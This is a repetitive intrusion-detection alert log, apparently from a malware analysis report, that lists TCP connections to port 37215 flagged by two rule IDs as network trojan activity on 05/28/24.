          Timestamp:05/28/24-14:47:44.891120
          SID:2829579
          Source Port:43948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322866
          SID:2835222
          Source Port:42158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.441464
          SID:2829579
          Source Port:46372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.763893
          SID:2829579
          Source Port:34690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.075040
          SID:2829579
          Source Port:36812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.634079
          SID:2835222
          Source Port:58394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.020502
          SID:2829579
          Source Port:60168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726977
          SID:2829579
          Source Port:50772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271662
          SID:2835222
          Source Port:46140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.009967
          SID:2829579
          Source Port:44500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268590
          SID:2835222
          Source Port:52012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136044
          SID:2835222
          Source Port:46076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.805070
          SID:2829579
          Source Port:41852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.979042
          SID:2835222
          Source Port:38218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.034028
          SID:2835222
          Source Port:49320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201694
          SID:2835222
          Source Port:58722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196002
          SID:2835222
          Source Port:56558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.525378
          SID:2829579
          Source Port:55410
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.311150
          SID:2835222
          Source Port:57866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298597
          SID:2829579
          Source Port:53512
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.295049
          SID:2835222
          Source Port:60736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689089
          SID:2835222
          Source Port:36436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183670
          SID:2829579
          Source Port:36076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.145218
          SID:2829579
          Source Port:48124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922024
          SID:2829579
          Source Port:58404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473614
          SID:2835222
          Source Port:50982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215990
          SID:2835222
          Source Port:44490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.820231
          SID:2835222
          Source Port:36118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741825
          SID:2835222
          Source Port:49226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744550
          SID:2835222
          Source Port:54740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847582
          SID:2829579
          Source Port:39404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941528
          SID:2829579
          Source Port:58990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.186229
          SID:2835222
          Source Port:49276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.868545
          SID:2835222
          Source Port:36242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.300994
          SID:2829579
          Source Port:53996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271604
          SID:2835222
          Source Port:43620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465238
          SID:2835222
          Source Port:58574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064258
          SID:2835222
          Source Port:35774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.770270
          SID:2829579
          Source Port:53330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.977322
          SID:2835222
          Source Port:50242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975263
          SID:2829579
          Source Port:52852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635201
          SID:2829579
          Source Port:35098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202962
          SID:2829579
          Source Port:44416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941628
          SID:2835222
          Source Port:37670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635212
          SID:2835222
          Source Port:40774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778906
          SID:2835222
          Source Port:53130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.152217
          SID:2829579
          Source Port:41478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.726651
          SID:2829579
          Source Port:52118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196035
          SID:2829579
          Source Port:47646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946620
          SID:2835222
          Source Port:48626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.662642
          SID:2829579
          Source Port:59122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.722362
          SID:2835222
          Source Port:54186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.083471
          SID:2835222
          Source Port:36480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.144952
          SID:2835222
          Source Port:58674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.240168
          SID:2835222
          Source Port:33460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.085531
          SID:2829579
          Source Port:45728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.268590
          SID:2829579
          Source Port:50154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.226165
          SID:2829579
          Source Port:47958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528836
          SID:2835222
          Source Port:59184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.817935
          SID:2835222
          Source Port:46220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.530020
          SID:2829579
          Source Port:51398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208313
          SID:2835222
          Source Port:59696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.873822
          SID:2835222
          Source Port:36940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778416
          SID:2829579
          Source Port:43006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210521
          SID:2835222
          Source Port:51806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.666565
          SID:2829579
          Source Port:36902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.619361
          SID:2829579
          Source Port:49640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.979042
          SID:2835222
          Source Port:38358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537722
          SID:2829579
          Source Port:37894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.487560
          SID:2835222
          Source Port:33462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778416
          SID:2835222
          Source Port:33886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774151
          SID:2829579
          Source Port:40528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.369192
          SID:2835222
          Source Port:60704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795844
          SID:2829579
          Source Port:45528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.662648
          SID:2829579
          Source Port:46934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.990678
          SID:2829579
          Source Port:51154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339305
          SID:2835222
          Source Port:43346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.946816
          SID:2835222
          Source Port:45456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711181
          SID:2835222
          Source Port:51210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202944
          SID:2835222
          Source Port:39698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.308082
          SID:2835222
          Source Port:48026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958428
          SID:2829579
          Source Port:46594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.817974
          SID:2835222
          Source Port:58764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.560456
          SID:2829579
          Source Port:49054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.297641
          SID:2835222
          Source Port:46196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.115584
          SID:2835222
          Source Port:49622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.163819
          SID:2829579
          Source Port:56078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497219
          SID:2835222
          Source Port:44124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.656192
          SID:2829579
          Source Port:45126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.965375
          SID:2835222
          Source Port:59986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.270827
          SID:2835222
          Source Port:45566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.867524
          SID:2835222
          Source Port:42200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039081
          SID:2835222
          Source Port:37976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214256
          SID:2835222
          Source Port:34776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.157585
          SID:2835222
          Source Port:41946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591391
          SID:2829579
          Source Port:56028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.840371
          SID:2829579
          Source Port:35598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033436
          SID:2829579
          Source Port:33872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484958
          SID:2829579
          Source Port:45956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.143809
          SID:2829579
          Source Port:48836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992128
          SID:2829579
          Source Port:40564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.317053
          SID:2829579
          Source Port:45198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.330189
          SID:2829579
          Source Port:59946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.537406
          SID:2829579
          Source Port:52550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336965
          SID:2829579
          Source Port:42314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689848
          SID:2835222
          Source Port:46760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337214
          SID:2829579
          Source Port:56742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943486
          SID:2829579
          Source Port:52788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.157424
          SID:2835222
          Source Port:58774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269663
          SID:2829579
          Source Port:56984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.234777
          SID:2835222
          Source Port:46268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.266185
          SID:2829579
          Source Port:47030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.151770
          SID:2829579
          Source Port:52576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893540
          SID:2835222
          Source Port:49458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.136044
          SID:2835222
          Source Port:50840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112215
          SID:2829579
          Source Port:33592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.855658
          SID:2835222
          Source Port:58018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535749
          SID:2835222
          Source Port:55296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.299319
          SID:2829579
          Source Port:44396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273185
          SID:2835222
          Source Port:36686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497372
          SID:2835222
          Source Port:36870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229736
          SID:2829579
          Source Port:44688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922436
          SID:2829579
          Source Port:32836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272880
          SID:2835222
          Source Port:40684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.332719
          SID:2835222
          Source Port:57308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066062
          SID:2835222
          Source Port:49758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839580
          SID:2835222
          Source Port:34314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.807479
          SID:2835222
          Source Port:44712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.876964
          SID:2835222
          Source Port:48734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066029
          SID:2829579
          Source Port:50576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209021
          SID:2835222
          Source Port:60540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536782
          SID:2835222
          Source Port:57622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.462119
          SID:2829579
          Source Port:52632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.554010
          SID:2829579
          Source Port:48148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877694
          SID:2829579
          Source Port:59468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.678549
          SID:2835222
          Source Port:38018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665449
          SID:2829579
          Source Port:55888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.797780
          SID:2829579
          Source Port:60144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.301352
          SID:2829579
          Source Port:57722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.489610
          SID:2835222
          Source Port:44800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.861473
          SID:2829579
          Source Port:42996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402973
          SID:2835222
          Source Port:34420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.438834
          SID:2829579
          Source Port:37158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.555132
          SID:2835222
          Source Port:43232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116704
          SID:2829579
          Source Port:35108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298979
          SID:2835222
          Source Port:49724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102313
          SID:2829579
          Source Port:34260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939368
          SID:2829579
          Source Port:39734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298194
          SID:2835222
          Source Port:53768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336971
          SID:2835222
          Source Port:44508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.970970
          SID:2829579
          Source Port:60590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.239378
          SID:2835222
          Source Port:36368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.602061
          SID:2835222
          Source Port:57330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.622187
          SID:2835222
          Source Port:40564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.087311
          SID:2829579
          Source Port:34758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.978664
          SID:2829579
          Source Port:48770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497566
          SID:2835222
          Source Port:47492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.084697
          SID:2835222
          Source Port:41088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.560217
          SID:2829579
          Source Port:38520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.284404
          SID:2835222
          Source Port:59408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.400649
          SID:2835222
          Source Port:45232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476398
          SID:2835222
          Source Port:33132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.753156
          SID:2835222
          Source Port:33802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.470984
          SID:2835222
          Source Port:52298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042423
          SID:2829579
          Source Port:43510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272731
          SID:2829579
          Source Port:47432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.366114
          SID:2829579
          Source Port:37334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.163661
          SID:2835222
          Source Port:42080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527191
          SID:2835222
          Source Port:51176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.428395
          SID:2835222
          Source Port:53418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977048
          SID:2835222
          Source Port:35448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291732
          SID:2835222
          Source Port:48100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.222861
          SID:2835222
          Source Port:57974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197306
          SID:2835222
          Source Port:44730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.965014
          SID:2829579
          Source Port:48068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.082771
          SID:2835222
          Source Port:53516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651161
          SID:2829579
          Source Port:49924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891087
          SID:2829579
          Source Port:44786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.234695
          SID:2835222
          Source Port:38948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.480453
          SID:2829579
          Source Port:32958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042452
          SID:2829579
          Source Port:35674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669278
          SID:2835222
          Source Port:48472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.170418
          SID:2835222
          Source Port:37120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206941
          SID:2829579
          Source Port:51060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324682
          SID:2829579
          Source Port:43456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.978948
          SID:2835222
          Source Port:50130
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.230371
          SID:2835222
          Source Port:49986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.301265
          SID:2829579
          Source Port:54032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.068450
          SID:2829579
          Source Port:46424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.068475
          SID:2829579
          Source Port:44072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728683
          SID:2835222
          Source Port:46538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.015060
          SID:2835222
          Source Port:53326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839813
          SID:2829579
          Source Port:48526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923706
          SID:2835222
          Source Port:42230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551578
          SID:2835222
          Source Port:49326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.301327
          SID:2829579
          Source Port:43558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847573
          SID:2835222
          Source Port:35408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.630727
